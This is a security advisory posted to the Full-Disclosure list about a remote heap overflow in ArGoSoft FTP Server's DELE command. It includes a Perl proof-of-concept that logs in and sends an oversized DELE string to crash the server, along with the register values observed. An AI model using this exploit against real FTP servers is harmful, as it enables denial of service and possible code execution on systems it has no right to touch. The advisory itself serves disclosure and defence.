-- Title: ArGoSoft FTP server remote heap overflow -- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and prior -- Affected Vendor: ArGoSoft - http://www.argosoft.com -- Impact: DoS, Arbitrary Code Execution -- Where: >>From remote -- Type: Heap Overflow -- Vulnerability Details: A remote attacker with valid credentials is able to trigger a heap overwrite in ArgoSoft FTP server. The bug occurs by providing a long argument to the DELE command. This vulnerability can allow remote attackers to execute arbitrary code or launch a denial of service attack. -- Credit: This vulnerability was discovered by Jerome Athias. https://www.securinfos.info/english/ #!/usr/bin/perl # ---------------------------------------------------- # # ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server # # Jerome Athias # # ---------------------------------------------------- # use Net::FTP; # geting data $host = @ARGV[0]; $port = @ARGV[1]; $debug = @ARGV[2]; $user = @ARGV[3]; $pass = @ARGV[4]; # =========== if (($host) && ($port)) { # make exploit string $exploit_string = "DELE "; $exploit_string .= "A" x 2041; $exploit_string .= "B" x 4; $exploit_string .= "C" x 1026; # On Win2K SP4 FR: # EAX 42424241 # ECX 43434343 # EDX 43434342 # EBX 43434B73 # =================== print "Trying to connect to $host:$port\n"; $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug=> $debug) or die "[-] Connection failed\n"; print "[+] Connect OK!\n"; print "Logging...\n"; if (!$user) { $user = "test"; $pass = "test"; } $sock->login($user, $pass); $answer = $sock->message; print "Sending string...\n"; $sock->quot($exploit_string); } else { print "ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n"; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/